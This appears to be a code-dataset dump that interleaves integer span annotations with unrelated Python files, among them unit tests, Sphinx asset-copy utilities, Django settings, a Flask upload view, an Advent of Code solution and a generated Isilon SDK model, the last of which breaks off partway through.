[
[
5288,
5308
]
],
[
[
5491,
5512
]
],
[
[
5953,
5972
]
],
[
[
7176,
7196
]
],
[
[
7495,
7506
]
],
[
[
7571,
7587
]
],
[
[
7649,
7656
]
],
[
[
7832,
7848
]
],
[
[
7910,
7923
]
],
[
[
7999,
8012
],
[
19245,
19258
],
[
19300,
19313
],
[
20982,
20995
]
],
[
[
8107,
8117
],
[
14066,
14076
],
[
14455,
14465
]
],
[
[
9239,
9248
],
[
10249,
10258
],
[
10287,
10296
],
[
10331,
10340
],
[
10400,
10409
],
[
10444,
10453
]
],
[
[
9301,
9309
],
[
10271,
10279
],
[
10371,
10379
]
],
[
[
9375,
9385
],
[
10314,
10324
],
[
10382,
10392
],
[
10427,
10437
]
],
[
[
9400,
9408
],
[
10299,
10307
],
[
10412,
10420
]
],
[
[
9493,
9506
]
],
[
[
10220,
10228
],
[
11158,
11166
],
[
14283,
14291
]
],
[
[
10347,
10355
],
[
10573,
10581
],
[
11212,
11220
]
],
[
[
10460,
10467
]
],
[
[
10842,
10860
]
],
[
[
11559,
11575
],
[
10888,
10904
]
],
[
[
11644,
11657
]
],
[
[
11833,
11848
],
[
10514,
10529
]
],
[
[
13042,
13060
]
],
[
[
13261,
13276
]
],
[
[
13369,
13383
]
],
[
[
13451,
13467
]
],
[
[
14208,
14221
],
[
14584,
14597
],
[
14615,
14628
]
],
[
[
14549,
14565
]
],
[
[
14647,
14658
]
],
[
[
15342,
15355
]
],
[
[
16054,
16065
]
],
[
[
16469,
16482
],
[
18159,
18172
]
],
[
[
17165,
17176
],
[
18212,
18223
]
],
[
[
17817,
17835
]
],
[
[
18664,
18686
]
],
[
[
19796,
19813
],
[
21495,
21512
]
],
[
[
20684,
20715
],
[
21704,
21735
]
],
[
[
21346,
21362
]
],
[
[
21797,
21818
]
]
] |
import unittest
from steem.utils import (
constructIdentifier,
sanitizePermlink,
derivePermlink,
resolveIdentifier,
yaml_parse_file,
formatTime,
)
class Testcases(unittest.TestCase) :
def test_constructIdentifier(self):
self.assertEqual(constructIdentifier("A", "B"), "@A/B")
def test_sanitizePermlink(self):
self.assertEqual(sanitizePermlink("aAf_0.12"), "aaf-0-12")
self.assertEqual(sanitizePermlink("[](){}"), "")
def test_derivePermlink(self):
self.assertEqual(derivePermlink("Hello World"), "hello-world")
self.assertEqual(derivePermlink("aAf_0.12"), "aaf-0-12")
self.assertEqual(derivePermlink("[](){}"), "")
def test_resolveIdentifier(self):
self.assertEqual(resolveIdentifier("@A/B"), ("A", "B"))
def test_yaml_parse_file(self):
pass
def test_formatTime(self):
self.assertEqual(formatTime(1463480746), "20160517t102546")
if __name__ == '__main__':
unittest.main()
| [
[
[
7,
15
],
[
189,
197
],
[
990,
998
]
],
[
[
46,
65
],
[
276,
295
]
],
[
[
71,
87
],
[
378,
394
],
[
445,
461
]
],
[
[
93,
107
],
[
538,
552
],
[
609,
623
],
[
674,
688
]
],
[
[
113,
130
],
[
768,
785
]
],
[
[
136,
151
]
],
[
[
157,
167
],
[
914,
924
]
],
[
[
179,
188
]
]
] |
"""File utility functions for Sphinx."""
import os
import posixpath
from typing import TYPE_CHECKING, Callable, Dict
from docutils.utils import relative_path
from sphinx.util.osutil import copyfile, ensuredir
from sphinx.util.typing import PathMatcher
if TYPE_CHECKING:
from sphinx.util.template import BaseRenderer
def copy_asset_file(source: str, destination: str,
context: Dict = None, renderer: "BaseRenderer" = None) -> None:
"""Copy an asset file to destination.
On copying, it expands the template variables if context argument is given and
the asset is a template file.
:param source: The path to source file
:param destination: The path to destination file or directory
:param context: The template variables. If not given, template files are simply copied
:param renderer: The template engine. If not given, SphinxRenderer is used by default
"""
if not os.path.exists(source):
return
if os.path.isdir(destination):
# Use source filename if destination points a directory
destination = os.path.join(destination, os.path.basename(source))
if source.lower().endswith('_t') and context is not None:
if renderer is None:
from sphinx.util.template import SphinxRenderer
renderer = SphinxRenderer()
with open(source, encoding='utf-8') as fsrc:
if destination.lower().endswith('_t'):
destination = destination[:-2]
with open(destination, 'w', encoding='utf-8') as fdst:
fdst.write(renderer.render_string(fsrc.read(), context))
else:
copyfile(source, destination)
def copy_asset(source: str, destination: str, excluded: PathMatcher = lambda path: False,
context: Dict = None, renderer: "BaseRenderer" = None,
onerror: Callable[[str, Exception], None] = None) -> None:
"""Copy asset files to destination recursively.
On copying, it expands the template variables if context argument is given and
the asset is a template file.
:param source: The path to source file or directory
:param destination: The path to destination directory
:param excluded: The matcher to determine the given path should be copied or not
:param context: The template variables. If not given, template files are simply copied
:param renderer: The template engine. If not given, SphinxRenderer is used by default
:param onerror: The error handler.
"""
if not os.path.exists(source):
return
if renderer is None:
from sphinx.util.template import SphinxRenderer
renderer = SphinxRenderer()
ensuredir(destination)
if os.path.isfile(source):
copy_asset_file(source, destination, context, renderer)
return
for root, dirs, files in os.walk(source, followlinks=True):
reldir = relative_path(source, root)
for dir in dirs[:]:
if excluded(posixpath.join(reldir, dir)):
dirs.remove(dir)
else:
ensuredir(posixpath.join(destination, reldir, dir))
for filename in files:
if not excluded(posixpath.join(reldir, filename)):
try:
copy_asset_file(posixpath.join(root, filename),
posixpath.join(destination, reldir),
context, renderer)
except Exception as exc:
if onerror:
onerror(posixpath.join(root, filename), exc)
else:
raise
| [
[
[
49,
51
],
[
933,
935
],
[
980,
982
],
[
1094,
1096
],
[
1120,
1122
],
[
2525,
2527
],
[
2717,
2719
],
[
2850,
2852
]
],
[
[
59,
68
],
[
2982,
2991
],
[
3089,
3098
],
[
3191,
3200
],
[
3283,
3292
],
[
3351,
3360
],
[
3548,
3557
]
],
[
[
88,
101
],
[
259,
272
]
],
[
[
103,
111
],
[
1864,
1872
]
],
[
[
113,
117
],
[
406,
410
],
[
1794,
1798
]
],
[
[
146,
159
],
[
2902,
2915
]
],
[
[
192,
200
],
[
1648,
1656
]
],
[
[
202,
211
],
[
2687,
2696
],
[
3079,
3088
]
],
[
[
243,
254
],
[
1736,
1747
]
],
[
[
311,
323
]
],
[
[
330,
345
],
[
2749,
2764
],
[
3267,
3282
]
],
[
[
1684,
1694
]
]
] |
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Marc Anthony Reyes and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestGame(unittest.TestCase):
pass
| [
[
[
123,
139
]
],
[
[
148,
154
]
],
[
[
162,
170
],
[
187,
195
]
],
[
[
178,
186
]
]
] |
#!/bin/env python3
def puzzle2():
entries = set()
allowed1 = {"byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"}
valid = 0
# Read in all the rules
with open('input.txt', 'r') as input:
l = 0
for line in input:
l += 1
if line == "\n":
# print(entries)
if len(allowed1 & entries) == 7:
valid += 1
entries = set()
else:
keyval = line.split(' ')
for i in keyval:
(key, val) = i.split(':')
if val[-1:] == '\n':
val = val[:-1]
if key == "byr":
val = int(val)
if val >= 1920 and val <= 2002:
entries.add(key)
else:
print('{} byr'.format(l))
if key == "iyr":
val = int(val)
if val >= 2010 and val <= 2020:
entries.add(key)
else:
print('{} iyr'.format(l))
if key == "eyr":
val = int(val)
if val >= 2020 and val <= 2030:
entries.add(key)
else:
print('{} eyr'.format(l))
if key == "hgt":
if val[-2:] == "cm":
val = int(val[:-2])
if val >= 150 and val <= 193:
entries.add(key)
else:
print('{} hgt'.format(l))
elif val[-2:] == "in":
val = int(val[:-2])
if val >= 59 and val <= 76:
entries.add(key)
else:
print('{} hgt'.format(l))
if key == "hcl":
if val[0] == '#':
val = val[1:]
check = 0
for c in val:
if c in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'b', 'c', 'd', 'e', 'f']:
check += 1
if check == 6:
entries.add(key)
else:
print('{} hcl'.format(l))
if key == "ecl":
if val in ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']:
entries.add(key)
else:
print('{} ecl'.format(l))
if key == "pid":
check = 0
for c in val:
if c in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']:
check += 1
if check == 9:
entries.add(key)
else:
print('{} pid'.format(l))
if len(allowed1 & entries) == 7:
valid += 1
print(valid)
if __name__ == "__main__":
puzzle2()
| [
[
[
23,
30
],
[
3389,
3396
]
]
] |
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""AutoGate top-k version Stage2 TrainerCallback."""
import logging
import pandas as pd
from vega.common import ClassFactory, ClassType
from vega.common import FileOps
from vega.algorithms.nas.fis.ctr_trainer_callback import CtrTrainerCallback
from vega.core.pipeline.conf import ModelConfig
logger = logging.getLogger(__name__)
@ClassFactory.register(ClassType.CALLBACK)
class AutoGateS2TrainerCallback(CtrTrainerCallback):
"""AutoGateS2TrainerCallback module."""
def __init__(self):
"""Construct AutoGateS2TrainerCallback class."""
super(CtrTrainerCallback, self).__init__()
self.sieve_board = pd.DataFrame(
columns=['selected_feature_pairs', 'score'])
self.selected_pairs = list()
logging.info("init autogate s2 trainer callback")
def before_train(self, logs=None):
"""Call before_train of the managed callbacks."""
super().before_train(logs)
"""Be called before the training process."""
hpo_result = FileOps.load_pickle(FileOps.join_path(
self.trainer.local_output_path, 'best_config.pickle'))
logging.info("loading stage1_hpo_result \n{}".format(hpo_result))
feature_interaction_score = hpo_result['feature_interaction_score']
print('feature_interaction_score:', feature_interaction_score)
sorted_pairs = sorted(feature_interaction_score.items(),
key=lambda x: abs(x[1]), reverse=True)
if ModelConfig.model_desc:
fis_ratio = ModelConfig.model_desc["custom"]["fis_ratio"]
else:
fis_ratio = 1.0
top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))
self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))
# add selected_pairs
setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)
def after_train(self, logs=None):
"""Call after_train of the managed callbacks."""
curr_auc = float(self.trainer.valid_metrics.results['auc'])
self.sieve_board = self.sieve_board.append(
{
'selected_feature_pairs': self.selected_pairs,
'score': curr_auc
}, ignore_index=True)
result_file = FileOps.join_path(
self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))
self.sieve_board.to_csv(result_file, sep='\t')
| [
[
[
508,
515
],
[
757,
764
],
[
1218,
1225
],
[
1599,
1606
]
],
[
[
524,
536
],
[
1097,
1099
]
],
[
[
562,
574
],
[
791,
803
]
],
[
[
576,
585
],
[
813,
822
]
],
[
[
611,
618
],
[
1483,
1490
],
[
1503,
1510
],
[
2776,
2783
]
],
[
[
677,
695
],
[
866,
884
],
[
1032,
1050
]
],
[
[
733,
744
],
[
1966,
1977
],
[
2015,
2026
],
[
2308,
2319
]
],
[
[
748,
754
]
],
[
[
840,
865
]
]
] |
from setuptools import setup, find_packages
with open("README.md", "r", encoding="utf-8") as f:
long_description = f.read()
setup_requirements = [
"wheel>=0.35.1",
]
requirements = ["Pillow>=7.2.0"]
test_requirements = [
"flake8>=3.8.3",
"pytest>=5.4.3",
]
dev_requirements = [
*setup_requirements,
*test_requirements,
]
extra_requirements = {
"setup": setup_requirements,
"test": test_requirements,
"all": [*requirements, *dev_requirements,],
}
setup(
name="image-scramble",
version="2.0.1",
author="catsital",
author_email="catshital@gmail.com",
description="Split image into tiles and scramble/unscramble them with seed.",
entry_points={"console_scripts": ["pycasso=pycasso.__main__:main"],},
install_requires=requirements,
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/catsital/pycasso",
project_urls={
"Bug Tracker": "https://github.com/catsital/pycasso/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=find_packages(),
setup_requires=setup_requirements,
tests_require=test_requirements,
extras_require=extra_requirements,
zip_safe=False
)
| [
[
[
23,
28
],
[
489,
494
]
],
[
[
30,
43
],
[
1211,
1224
]
],
[
[
94,
95
],
[
120,
121
]
],
[
[
101,
117
],
[
819,
835
]
],
[
[
130,
148
],
[
304,
322
],
[
387,
405
],
[
1247,
1265
]
],
[
[
177,
189
],
[
451,
463
],
[
784,
796
]
],
[
[
211,
228
],
[
329,
346
],
[
419,
436
],
[
1285,
1302
]
],
[
[
278,
294
],
[
466,
482
]
],
[
[
351,
369
],
[
1323,
1341
]
]
] |
from collections import OrderedDict
import pytest
from company.constants import RegistrationNumberChoices
from company.models import Country
from company.serialisers import CompanySerialiser
from .factories import CompanyFactory, IndustryCodeFactory, PrimaryIndustryCodeFactory, RegistrationNumberFactory
@pytest.mark.django_db
def test_company_serialiser():
company = CompanyFactory(**{
'duns_number': '123456789',
'primary_name': 'Test Company 1',
'trading_names': ['ACME trading corp'],
'global_ultimate_duns_number': '888888888',
'global_ultimate_primary_name': 'global primary name',
'domain': 'www.e-corp.corp',
'is_out_of_business': False,
'address_line_1': 'The Old Test Mill 1',
'address_line_2': '100 Test Rd',
'address_town': 'Cheshire',
'address_county': 'address county',
'address_area_name': 'address area name',
'address_area_abbrev_name': 'abr',
'address_postcode': 'address postcode',
'address_country': Country.objects.get(iso_alpha2='GB'),
'registered_address_line_1': 'reg address line 1',
'registered_address_line_2': 'reg address line 2',
'registered_address_town': 'reg address town',
'registered_address_county': 'reg address county',
'registered_address_area_name': 'reg address area name',
'registered_address_area_abbrev_name': 'abr',
'registered_address_country': Country.objects.get(iso_alpha2='GB'),
'registered_address_postcode': 'reg postcode',
'annual_sales': 51806612000,
'annual_sales_currency': 'USD',
'is_annual_sales_estimated': None,
'employee_number': 24,
'year_started': 2000,
'is_employees_number_estimated': False,
'legal_status': 'foreign_company'
})
RegistrationNumberFactory(**{
'company': company,
'registration_type': RegistrationNumberChoices.uk_vat_number,
'registration_number': '12341234',
})
IndustryCodeFactory(**{
'company': company,
'code': '517919',
'description': 'All Other Telecommunications',
'typeDescription': 'North American Industry Classification System 2017',
'typeDnBCode': 30832,
'priority': 2
})
IndustryCodeFactory(**{
'company': company,
'code': '423690',
'description': 'Other Electronic Parts and Equipment Merchant Wholesalers',
'typeDescription': 'North American Industry Classification System 2017',
'typeDnBCode': 30832,
'priority': 1
})
PrimaryIndustryCodeFactory(**{
'company': company,
'usSicV4': '5065',
'usSicV4Description': 'Whol electronic parts/equipment'
})
assert CompanySerialiser(company).data == {
'last_updated': None,
'duns_number': '123456789',
'primary_name': 'Test Company 1',
'trading_names': ['ACME trading corp'],
'registration_numbers': [
OrderedDict(
[
('registration_type', 'VAT Registration number'),
('registration_number', '12341234'),
]
)
],
'global_ultimate_duns_number': '888888888',
'global_ultimate_primary_name': 'global primary name',
'domain': 'www.e-corp.corp',
'is_out_of_business': False,
'address_line_1': 'The Old Test Mill 1',
'address_line_2': '100 Test Rd',
'address_town': 'Cheshire',
'address_county': 'address county',
'address_area_name': 'address area name',
'address_area_abbrev_name': 'abr',
'address_postcode': 'address postcode',
'address_country': 'GB',
'registered_address_line_1': 'reg address line 1',
'registered_address_line_2': 'reg address line 2',
'registered_address_town': 'reg address town',
'registered_address_county': 'reg address county',
'registered_address_area_name': 'reg address area name',
'registered_address_area_abbrev_name': 'abr',
'registered_address_country': 'GB',
'registered_address_postcode': 'reg postcode',
'annual_sales': 51806612000.0,
'annual_sales_currency': 'USD',
'is_annual_sales_estimated': None,
'employee_number': 24,
'is_employees_number_estimated': False,
'primary_industry_codes': [
OrderedDict([
('usSicV4', '5065'),
('usSicV4Description', 'Whol electronic parts/equipment'),
])
],
'industry_codes': [
OrderedDict(
[
('code', '423690'),
('description', 'Other Electronic Parts and Equipment Merchant Wholesalers'),
('priority', 1),
('typeDescription', 'North American Industry Classification System 2017'),
('typeDnBCode', '30832'),
]
),
OrderedDict(
[
('code', '517919'),
('description', 'All Other Telecommunications'),
('priority', 2),
('typeDescription', 'North American Industry Classification System 2017'),
('typeDnBCode', '30832'),
]
)
],
'line_of_business': '',
'year_started': 2000,
'legal_status': 'foreign_company'
}
| [
[
[
24,
35
],
[
3029,
3040
],
[
4462,
4473
],
[
4654,
4665
],
[
5046,
5057
]
],
[
[
44,
50
],
[
310,
316
]
],
[
[
82,
107
],
[
1940,
1965
]
],
[
[
135,
142
],
[
1049,
1056
],
[
1477,
1484
]
],
[
[
175,
192
],
[
2790,
2807
]
],
[
[
216,
230
],
[
377,
391
]
],
[
[
232,
251
],
[
2036,
2055
],
[
2314,
2333
]
],
[
[
253,
279
],
[
2621,
2647
]
],
[
[
281,
306
],
[
1853,
1878
]
],
[
[
336,
359
]
]
] |
"""
Django settings for drf_sample project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import sys
import os
sys.path.append('/fan/')
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ov0!!1=grqmn-1^gdcm87a+=al3)(t9xnionsx)*&oe&3l+x4*'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'drf_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'fan.contrib.django.FanMiddleware',
]
ROOT_URLCONF = 'drf_sample.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'drf_sample.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
},
},
'handlers': {
'default': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': 'default.log',
'formatter': 'standard',
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': 'DEBUG',
'propagate': True,
},
},
}
| [
[
[
320,
323
],
[
335,
338
]
],
[
[
331,
333
],
[
444,
446
],
[
460,
462
],
[
476,
478
],
[
2323,
2325
]
],
[
[
433,
441
],
[
2336,
2344
]
],
[
[
710,
720
]
],
[
[
843,
848
]
],
[
[
857,
870
]
],
[
[
904,
918
]
],
[
[
1127,
1137
]
],
[
[
1581,
1593
]
],
[
[
1615,
1624
]
],
[
[
2100,
2116
]
],
[
[
2228,
2237
]
],
[
[
2474,
2498
]
],
[
[
2978,
2991
]
],
[
[
3003,
3012
]
],
[
[
3022,
3030
]
],
[
[
3039,
3047
]
],
[
[
3056,
3062
]
],
[
[
3175,
3185
]
],
[
[
3200,
3207
]
]
] |
import os
from flask import render_template, url_for, redirect
from werkzeug.utils import secure_filename
from app import app
from app.forms import ScriptForm
from Script_reader import table_creator
@app.route('/', methods=['POST', 'GET'])
@app.route('/index', methods=['POST', 'GET'])
def index():
form = ScriptForm()
if form.validate_on_submit():
f = form.script.data
filename = secure_filename(f.filename)
file_path = os.path.join(app.instance_path, 'scripts', filename)
f.save(os.path.join(app.instance_path, 'scripts', filename))
table = table_creator(file_path).get_html_string()
os.remove(file_path)
return table
return render_template('index.html', title='Home', form=form)
@app.route('/locations', methods=['POST', 'GET'])
def locations():
pass
#Perhaps use http://flask.pocoo.org/docs/0.12/api/#flask.send_from_directory to allow a CSV to be downloaded.
| [
[
[
7,
9
],
[
456,
458
],
[
524,
526
],
[
645,
647
]
],
[
[
28,
43
],
[
698,
713
]
],
[
[
45,
52
]
],
[
[
54,
62
]
],
[
[
90,
105
],
[
408,
423
]
],
[
[
123,
126
],
[
203,
206
],
[
244,
247
],
[
755,
758
],
[
469,
472
],
[
537,
540
]
],
[
[
149,
159
],
[
313,
323
]
],
[
[
186,
199
],
[
594,
607
]
],
[
[
293,
298
]
],
[
[
808,
817
]
]
] |
import pandas as pd
import numpy as np
from collections import defaultdict
import RemovingDataSolns as s
# Question 1
def prop_sals_test(prop_sals):
'''
INPUT prop_sals - a float as the percent of missing values in the salary column
Prints statement related to the correctness of the solution of the proportion
'''
if np.allclose(prop_sals, s.prop_sals):
print("Nice job! That looks right!")
else:
print("Oops! Make sure your value is for the proportion of nan values in only the Salary column.")
# Question 2
def sal_rm_test(sal_rm):
'''
INPUT sal_rm - a pandas dataframe with all rows that are missing a value the salary column removed. The dataframe should only have the columns of num_vars (quant variables)
Prints statement related to the correctness of the solution of the dataframe
'''
if sal_rm.equals(s.sal_rm):
print("Nice job! That looks right!")
else:
print("That wasn't quite as expected. Try again, this should be the num_vars dataframe with salary removed.")
# Question 3
def question3_check(question3_solution):
'''
INPUT question3_solution - the letter (a, b, or c) corresponding to the statement that best describes what happend when fitting your model.
Prints statement related to the correctness of the letter chosen.
'''
if question3_solution == s.question3_solution:
print("Nice job! That's right! Those missing values in the X matrix will still not allow us to predict the response.")
else:
print("Oops! That wasn't what we were expecting. Your solution should be either a, b, or c for the string that best relates to what happened.")
# Question 4
def all_rm_test(all_rm):
'''
INPUT all_rm - a pandas dataframe with all rows that are missing a value in any column removed from num_vars (only the numeric columns)
Prints statement related to the correctness of the solution of the dataframe
'''
if all_rm.equals(s.all_rm):
print("Nice job! That looks right. The default is to drop any row with a missing value in any column, so we didn't need to specify any arguments in this case.")
else:
print("Oops! That doesn't look like what we were expecting. Make sure you are working with only the numeric columns, and you have dropped any rows with missing values.")
# Question 5
def question5_check(question5_solution):
'''
INPUT question3_solution - the letter (a, b, or c) corresponding to the statement that best describes what happend when fitting your model.
Prints statement related to the correctness of the letter chosen.
'''
if question5_solution == s.question5_solution:
print("Nice job! That's right! Python isn't exactly magic, but sometimes it feels like it is!")
else:
print("Oops! Your solution should have worked. In which case, no output should have printed. This solution should follow just as in the screencast.")
# Question 6
def r2_test_check(r2_test):
'''
INPUT r2_test - the rsquared value from fitting a model with all nan values dropped and only using quantitative variables.
Prints statement related to the correctness rsquared matching solution.
'''
if r2_test == s.r2_test:
print("Nice job! That's right! Your rsquared matches the solution.")
else:
print("Oops! That wasn't the value that was expected. You should fit your model using the training data, predict on the X_test data, and then score comparing the y_test and your predicted values.")
# Question 7
def question7_check(question7_solution):
'''
INPUT question7_solution - a dictionary with statements of takeaways from the rest of the notebook. The values should be the variables a, b, c, d, e, f, or g
Prints statement related to the correctness of the solution of the dictionary
'''
if question7_solution == s.question7_solution:
print("Nice job! That looks right to me! We would really like to predict for anyone who provides a salary, but our model right now definitely has some limitations.")
elif question7_solution['The number of reported salaries in the original dataset'] != s.question7_solution['The number of reported salaries in the original dataset']:
print("The number of reported salaries in the original dataset doesn't look quite right.")
elif question7_solution['The number of test salaries predicted using our model'] != s.question7_solution['The number of test salaries predicted using our model']:
print("The number of salaries predicted using our model doesn't look quite right.")
elif question7_solution['If an individual does not rate stackoverflow, but has a salary'] != s.question7_solution['If an individual does not rate stackoverflow, but has a salary']:
print("Whether an individual rates stackoverflow or has a job satisfaction we would still like to predict the salary if we can.")
elif question7_solution['If an individual does not have a a job satisfaction, but has a salary'] != s.question7_solution['If an individual does not have a a job satisfaction, but has a salary']:
print("Whether an individual rates stackoverflow or has a job satisfaction we would still like to predict the salary if we can.")
elif question7_solution['Our model predicts salaries for the two individuals described above.'] != s.question7_solution['Our model predicts salaries for the two individuals described above.']:
print("Unfortunately, our current model will not predict for anyone who has missing values in any column - even if they do have a salary!")
| [
[
[
7,
19
]
],
[
[
28,
39
],
[
352,
354
]
],
[
[
65,
76
]
],
[
[
85,
107
],
[
375,
376
],
[
902,
903
],
[
1414,
1415
],
[
2039,
2040
],
[
2739,
2740
],
[
3330,
3331
],
[
3994,
3995
],
[
4283,
4284
],
[
4553,
4554
],
[
4823,
4824
],
[
5155,
5156
],
[
5493,
5494
]
],
[
[
129,
143
]
],
[
[
578,
589
]
],
[
[
1111,
1126
]
],
[
[
1753,
1764
]
],
[
[
2436,
2451
]
],
[
[
3062,
3075
]
],
[
[
3660,
3675
]
]
] |
# import sharpy.utils.settings as settings
# import sharpy.utils.exceptions as exceptions
# import sharpy.utils.cout_utils as cout
import numpy as np
import importlib
import unittest
import os
import sharpy.utils.cout_utils as cout
class TestCoupledPrescribed(unittest.TestCase):
"""
"""
@classmethod
def setUpClass(cls):
# run all the cases generators
# case = 'smith_2deg_prescribed'
# mod = importlib.import_module('tests.coupled.prescribed.' + case + '.generate_' + case)
# case = 'rotating_wing'
# mod1 = importlib.import_module('tests.coupled.prescribed.' + case + '.generate_' + case)
pass
@classmethod
def tearDownClass(cls):
pass
# def test_smith2deg_prescribed(self):
# import sharpy.sharpy_main
# solver_path = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) +
# '/smith_2deg_prescribed/smith_2deg_prescribed.sharpy')
# sharpy.sharpy_main.main(['', solver_path])
#
# # read output and compare
# output_path = os.path.dirname(solver_path) + 'output/aero/'
# forces_data = np.genfromtxt(output_path + 'smith_2deg_prescribed_aeroforces.csv')
# self.assertAlmostEqual(forces_data[-1, 3], -3.728e1, 1)
def test_rotating_wing(self):
# import sharpy.sharpy_main
# solver_path = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) +
# '/rotating_wing/rotating_wing.sharpy')
# sharpy.sharpy_main.main(['', solver_path])
cout.cout_wrap('No tests for prescribed dynamic configurations (yet)!', 1)
pass
| [
[
[
138,
149
]
],
[
[
157,
166
]
],
[
[
174,
182
],
[
262,
270
]
],
[
[
190,
192
]
],
[
[
200,
231
],
[
1604,
1608
]
],
[
[
240,
261
]
]
] |
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_2_2.models.cloud_proxy import CloudProxy # noqa: F401,E501
class CloudProxyCreateParams(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'host': 'str',
'name': 'str',
'password': 'str',
'port': 'int',
'type': 'str',
'username': 'str'
}
attribute_map = {
'host': 'host',
'name': 'name',
'password': 'password',
'port': 'port',
'type': 'type',
'username': 'username'
}
def __init__(self, host=None, name=None, password=None, port=None, type=None, username=None): # noqa: E501
"""CloudProxyCreateParams - a model defined in Swagger""" # noqa: E501
self._host = None
self._name = None
self._password = None
self._port = None
self._type = None
self._username = None
self.discriminator = None
self.host = host
self.name = name
if password is not None:
self.password = password
self.port = port
self.type = type
if username is not None:
self.username = username
@property
def host(self):
"""Gets the host of this CloudProxyCreateParams. # noqa: E501
A host name or network address for connecting to this proxy # noqa: E501
:return: The host of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._host
@host.setter
def host(self, host):
"""Sets the host of this CloudProxyCreateParams.
A host name or network address for connecting to this proxy # noqa: E501
:param host: The host of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
if host is None:
raise ValueError("Invalid value for `host`, must not be `None`") # noqa: E501
self._host = host
@property
def name(self):
"""Gets the name of this CloudProxyCreateParams. # noqa: E501
A unique friendly name for this proxy configuration # noqa: E501
:return: The name of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this CloudProxyCreateParams.
A unique friendly name for this proxy configuration # noqa: E501
:param name: The name of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def password(self):
"""Gets the password of this CloudProxyCreateParams. # noqa: E501
The password to connect to this proxy if required (write-only) # noqa: E501
:return: The password of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._password
@password.setter
def password(self, password):
"""Sets the password of this CloudProxyCreateParams.
The password to connect to this proxy if required (write-only) # noqa: E501
:param password: The password of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
self._password = password
@property
def port(self):
